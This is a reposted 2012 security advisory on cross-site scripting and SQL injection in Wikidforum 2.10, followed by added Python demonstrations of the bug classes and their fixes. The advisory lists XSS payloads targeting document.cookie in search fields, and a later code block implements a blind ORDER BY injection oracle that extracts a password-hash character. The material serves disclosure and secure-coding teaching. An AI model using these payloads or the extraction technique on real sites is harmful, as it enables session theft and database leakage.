Wikidforum 2.10 Cross Site Scripting / SQL Injection

12 Mar 2012. Reported by Stefan Schurtz. Source: packetstorm (packetstormsecurity.com)

Wikidforum 2.10 Multiple security vulnerabilities, prone to XSS and SQL-Injection


Advisory: Wikidforum 2.10 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-005
Author: Stefan Schurtz
Affected Software: Successfully tested on Wikidforum 2.10
Vendor URL: http://www.wikidforum.com/
Vendor Status: informed

==========================
Vulnerability Description
==========================

Wikidforum 2.10 is prone to multiple XSS and SQL-Injection vulnerabilities

==================
PoC-Exploit
==================

// xss
Search-Field -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)>

// possible SQL-Injection

Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection]
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]

=========
Solution
=========

-

====================
Disclosure Timeline
====================

19-Feb-2012 - vendor informed
10-Mar-2012 - no response from vendor

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt
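The two XSS payloads in the PoC tell you where the search term is being reflected: the first one carries a `</script>` tag, which ends an inline script block no matter how the surrounding JavaScript string is quoted, and the `select_sort` payload starts with `>`, which closes whatever tag or attribute the value is echoed into. The following is an added example, not code from the advisory or from Wikidforum (whose templates are not shown on the page): a hypothetical search page that reproduces the bug class, beside the same page with per-context encoding, checked against the advisory's own payloads.

```python
import html
import json

# Payloads copied from the advisory's PoC section. The first shows the term
# reflected inside an inline <script> block (the closing tag ends the script
# regardless of quoting); the second shows reflection into a tag/attribute
# context that a leading '>' can close.
PAYLOAD_SCRIPT = "'\"</script><script>alert(document.cookie)</script>"
PAYLOAD_TAG = "><iMg src=N onerror=alert(document.cookie)>"


def render_unsafe(term: str) -> str:
    """Hypothetical vulnerable search page (an assumption, not Wikidforum's
    real template): the submitted term is copied verbatim into an attribute
    and into a JavaScript string literal. Models the reported bug class."""
    return (
        f'<input name="search" value="{term}">\n'
        f"<script>var lastSearch = '{term}';</script>"
    )


def escape_html_attr(value: str) -> str:
    """Entity-encode for HTML text and quoted-attribute contexts."""
    return html.escape(value, quote=True)


def escape_js_string(value: str) -> str:
    """Return a JavaScript string literal, quotes included, that is safe to
    embed in an inline <script> block. json.dumps (ensure_ascii default)
    escapes quotes, backslashes and every non-ASCII character, including
    U+2028/U+2029; the replacements below additionally neutralise < > &,
    so the HTML parser can never see a '</script>' inside the literal."""
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def render_safe(term: str) -> str:
    """The same page with encoding chosen per sink: entities for the
    attribute, a JS string literal for the script block."""
    return (
        f'<input name="search" value="{escape_html_attr(term)}">\n'
        f"<script>var lastSearch = {escape_js_string(term)};</script>"
    )


def attacker_markup_present(page: str) -> bool:
    """Check used by the demo: the page is broken if it contains more than
    the template's single closing </script> tag, or any <img> tag. A real
    test would parse the DOM; a substring check suffices for these payloads."""
    lowered = page.lower()
    return lowered.count("</script>") > 1 or "<img" in lowered


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT, PAYLOAD_TAG):
        print("unsafe page breaks out:", attacker_markup_present(render_unsafe(payload)))
        print("safe page breaks out:  ", attacker_markup_present(render_safe(payload)))
```

The point of `escape_js_string` is that HTML-entity encoding alone is wrong inside a `<script>` block (the browser does not decode entities there), and JSON encoding alone is not enough either, because a literal `</script>` inside a JS string still terminates the script element; encoding `<` as `\u003c` satisfies both parsers.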

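`select_sort` and `opt_search_select` are the classic shape of an ORDER BY / column-selector injection: a value that picks a column cannot be bound as a query parameter, so a forum that pastes it into the SQL text hands the attacker an arbitrary expression, and because ORDER BY accepts any expression the result order becomes a boolean oracle. The following is an added example, not the advisory's or Wikidforum's code (its schema and queries are not on the page); the table layout, column names and the hash value are constructed for the demonstration. It shows the splicing pattern, a blind-extraction sort expression run against it, and the hardened handler that allowlists the sort field and binds the term.

```python
import sqlite3

# Request values a user may send as 'select_sort', mapped to the column each
# stands for. The identifier placed in ORDER BY always comes from this table,
# never from the request; the same approach applies to 'opt_search_select'.
SORT_COLUMNS = {"date": "created_at", "author": "author", "title": "title"}


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a forum database (sample data and
    schema are assumptions, not Wikidforum's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, "
                 "author TEXT, created_at TEXT)")
    conn.executemany(
        "INSERT INTO posts (title, author, created_at) VALUES (?, ?, ?)",
        [("Welcome", "alice", "2012-01-01"),
         ("Forum rules", "zed", "2012-01-02"),
         ("Hello world", "admin", "2012-02-10")],
    )
    conn.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
    # Made-up hash value, used only as the secret the oracle extracts.
    conn.execute("INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99')")
    return conn


def search_unsafe(conn, term, select_sort):
    """Hypothetical vulnerable handler: term and sort field are spliced into
    the SQL text. Models the bug class reported for 'select_sort'; do not use."""
    sql = (f"SELECT title, author FROM posts WHERE title LIKE '%{term}%' "
           f"ORDER BY {select_sort}")
    return conn.execute(sql).fetchall()


def oracle_sort(guess):
    """Attacker-chosen 'select_sort' value. The CASE compares one character
    of a secret with 'guess', so the rows come back sorted by title when the
    guess is right and by author when it is wrong."""
    return ("(CASE WHEN (SELECT substr(password_hash, 1, 1) FROM users "
            f"WHERE name = 'admin') = '{guess}' THEN title ELSE author END)")


def leak_first_hash_char(conn):
    """Blind extraction through the sort order: one request per candidate,
    reading the answer from which post is listed first."""
    for guess in "0123456789abcdef":
        first_title = search_unsafe(conn, "", oracle_sort(guess))[0][0]
        if first_title == "Forum rules":  # title order => condition was true
            return guess
    return None


def like_pattern(term):
    """Escape LIKE metacharacters so a term cannot widen the match."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return f"%{escaped}%"


def sort_is_allowed(select_sort):
    return select_sort in SORT_COLUMNS


def search_safe(conn, term, select_sort):
    """Hardened handler: allowlisted identifier for ORDER BY, bound parameter
    for the term. Unknown sort fields are rejected rather than guessed."""
    if not sort_is_allowed(select_sort):
        raise ValueError(f"unsupported sort field: {select_sort!r}")
    sql = (f"SELECT title, author FROM posts WHERE title LIKE ? ESCAPE '\\' "
           f"ORDER BY {SORT_COLUMNS[select_sort]}")
    return conn.execute(sql, (like_pattern(term),)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print("hash char leaked via ORDER BY:", leak_first_hash_char(db))
    print("safe search for \"' OR 1=1 --\":", search_safe(db, "' OR 1=1 --", "title"))
```

Note that the allowlist is the whole fix for the sort parameter: escaping or quoting the value does not help, because a quoted identifier is not the expression the attacker needs anyway, and a prepared statement cannot take a column name as a bound value.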